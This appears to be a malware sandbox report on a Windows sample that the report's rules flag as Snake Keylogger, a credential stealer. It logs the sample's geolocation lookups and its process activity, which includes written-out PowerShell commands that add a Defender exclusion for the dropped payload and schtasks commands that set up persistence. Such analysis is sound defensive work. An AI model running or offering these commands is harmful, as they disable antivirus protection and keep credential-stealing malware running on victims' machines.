2025-01-02 19:19:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49781	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:57 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:19:57 UTC	857	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160386 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KnK0jxUv7hOYpp3v9TINJFmycTKjbLloqQv8buR9msIPpvfmaH0JoMJH8%2Bsea8eGMInVTWZtPBdrVmGlwiahT0mAqgh2i2PgYe3i70XkwwnQs034yh50OR%2FiG8zn%2BqQ1b30Z%2B28U"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a88ca4e4229-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1883&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1454907&cwnd=236&unsent_bytes=0&cid=3a479f57cbbde80c&ts=159&x=0"
2025-01-02 19:19:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49789	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:58 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:19:58 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160387 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1F2b11U2Bpzl2il3mHMZnnGnsjwgz%2FGBjaNzRMkh4C7pJ0SJbpzPx%2BaTp%2FpT5jf3MTcDTQfKN3RHA%2BJ6WdcILDleaFstxAlNwoAOXBfvuJFaX8YvjgY9K%2FuJ7LWsxJAwT7DOwQLe"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a8ddf57433f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1631&min_rtt=1624&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1732937&cwnd=222&unsent_bytes=0&cid=572db6ff5eae60e0&ts=139&x=0"
2025-01-02 19:19:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49795	188.114.96.3	443	3328	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:58 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:19:58 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160387 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9cLciti0mfS4sVQrow3O9L4CRtTlCvg0c%2Bo%2Fego%2Ftfkh2FNOLDIGaYNWEeD9lCKVuUIga0i0SHcUQCmjLhN09cuCNgmDGwPgU6tVQKa4KuKw6B6fbdjdRCBec%2B8spVZusRleH%2BG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a903c54429b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1773&rtt_var=728&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1440552&cwnd=238&unsent_bytes=0&cid=2600eb5e75b020d4&ts=186&x=0"
2025-01-02 19:19:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49802	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:19:59 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-02 19:19:59 UTC	863	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:19:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160388 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwlgJNOERO%2F71EK1b9%2FUlQjzzzTh2Z3UK9kb3RxF17O%2BFLnq77Et%2BAumvB0AmJMgqu%2BFjAWzUVOIBZoUgXczIsNV5%2BgdBQTChOV%2BSecbCynajuj9uRTi8S1SpS8DrGyC6HOGI17W"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1a96297143d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1604&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1795817&cwnd=236&unsent_bytes=0&cid=bcbe76d731b4c69d&ts=135&x=0"
2025-01-02 19:19:59 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49818	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:20:01 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:20:01 UTC	860	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:20:01 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160391 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lhnk8JZqHjApsSJnqYolMKNiuzlI5LIhLNog9TXF3XzSAEnXOViMyKZIskhEU%2FNKYSkkNCThbWQ9Dr%2FI%2BWERuyPu36t5CYm0GpqmC98%2FWX5P0RxFry%2BFwbyS4s2IOmkglb1m%2BnQZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1aa3ca916a5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1815&rtt_var=907&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=245770&cwnd=209&unsent_bytes=0&cid=2bb2578687454e7f&ts=305&x=0"
2025-01-02 19:20:01 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49860	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:20:08 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:20:08 UTC	853	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:20:08 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160397 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oq5Xk6WH3BgSiRCL5ns31RLl0Qq6F0I3x3Ad8sjyZhiK75UcU11jUh6Q9iphkI2W90ctkJl2hO1oguWv5huDYgdSPP4hwlR04xWHcdJtB9HdfumEl3OEIIS3c2vqNQ%2FFl2vj%2BiXH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1acecb14439c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1715&min_rtt=1653&rtt_var=664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1766485&cwnd=224&unsent_bytes=0&cid=375ef40a268eda71&ts=177&x=0"
2025-01-02 19:20:08 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49905	188.114.96.3	443	1588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 19:20:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-02 19:20:15 UTC	859	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 19:20:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1160404 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UVSNuhw8Af5AhCqbwR1H51hZgkTocdk9juRKuJjlTIBXF9pmT7GvBh6M%2B03AfuDTaIuJ0x06V9g%2B4%2FDemUAbY2C4G%2F8t9WEkjaSJ51FqsLo8fAylkOA%2FJcD4NPRbjICid4BO4IJq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fbd1afa5cfe41c6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2520&min_rtt=2513&rtt_var=957&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1135303&cwnd=204&unsent_bytes=0&cid=40d9cecdf43ad084&ts=171&x=0"
2025-01-02 19:20:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	14:19:44
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xf60000
File size:	606'728 bytes
MD5 hash:	67B58449B42453F18E51B2BF786F9588
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2231352999.000000000450E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:19:47
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\djqdPdQRO.exe"
Imagebase:	0x670000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:19:47
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:19:47
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp8017.tmp"
Imagebase:	0x7f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:19:47
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:19:47
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x5b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.2317370744.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2319885033.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:19:49
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff717f30000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:19:49
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Roaming\djqdPdQRO.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\djqdPdQRO.exe
Imagebase:	0x2d0000
File size:	606'728 bytes
MD5 hash:	67B58449B42453F18E51B2BF786F9588
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.2281225778.000000000380F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:19:52
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\djqdPdQRO" /XML "C:\Users\user\AppData\Local\Temp\tmp93EE.tmp"
Imagebase:	0x7f0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:19:52
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
